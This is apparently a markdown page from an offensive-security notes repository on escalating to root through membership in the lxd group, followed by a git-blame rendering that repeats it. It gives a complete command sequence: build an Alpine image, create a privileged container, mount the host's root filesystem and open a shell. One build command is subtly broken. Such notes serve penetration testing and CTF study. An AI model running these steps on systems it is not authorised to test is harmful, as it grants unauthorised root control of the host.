killchain-compendium/Exploits/Containers/LXC.md

# LXC

## Privilege Escalation

### Member of lxd Group

* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)
* User has to be in `lxd` group, not necessarily `sudo`.

#### Usage

* Clone and build

```sh
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builde && sudo && ./build alpine
```

* Upload to target
* Import alpine image

```sh
lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage
```

* Prepare image

```sh
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
```

* Host `/` is mounted at `/mnt/root` inside the container
* `root` directory is at `/mnt/root/root`

## Errors

If you see errors like this

```sh
Error: No storage pool found. Please create a new storage pool
```

Remember to initialize the lxd via

```sh
lxd init
```
added a description for no storage pool found 2023-11-18 19:41:39 +01:00			`# LXC`
restructured Exploits 2022-11-13 22:38:01 +01:00
			`## Privilege Escalation`

			`### Member of lxd Group`

			`* [Hackingarticles article](https://www.hackingarticles.in/lxd-privilege-escalation/)`
			* User has to be in `lxd` group, not necessarily `sudo`.

			`#### Usage`
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
			`* Clone and build`

restructured Exploits 2022-11-13 22:38:01 +01:00			```sh
			`git clone https://github.com/saghul/lxd-alpine-builder.git`
			`cd lxd-alpine-builde && sudo && ./build alpine`
			```
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			`* Upload to target`
			`* Import alpine image`
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			```sh
			`lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage`
			```
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			`* Prepare image`
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			```sh
			`lxc image list`
			`lxc init myimage ignite -c security.privileged=true`
			`lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`
			`lxc start ignite`
			`lxc exec ignite /bin/sh`
			```
added a description for no storage pool found 2023-11-18 19:41:39 +01:00
restructured Exploits 2022-11-13 22:38:01 +01:00			* Host `/` is mounted at `/mnt/root` inside the container
			* `root` directory is at `/mnt/root/root`

added a description for no storage pool found 2023-11-18 19:41:39 +01:00			`## Errors`
restructured Exploits 2022-11-13 22:38:01 +01:00
added a description for no storage pool found 2023-11-18 19:41:39 +01:00			`If you see errors like this`

			```sh
			`Error: No storage pool found. Please create a new storage pool`
			```

			`Remember to initialize the lxd via`

			```sh
			`lxd init`
			```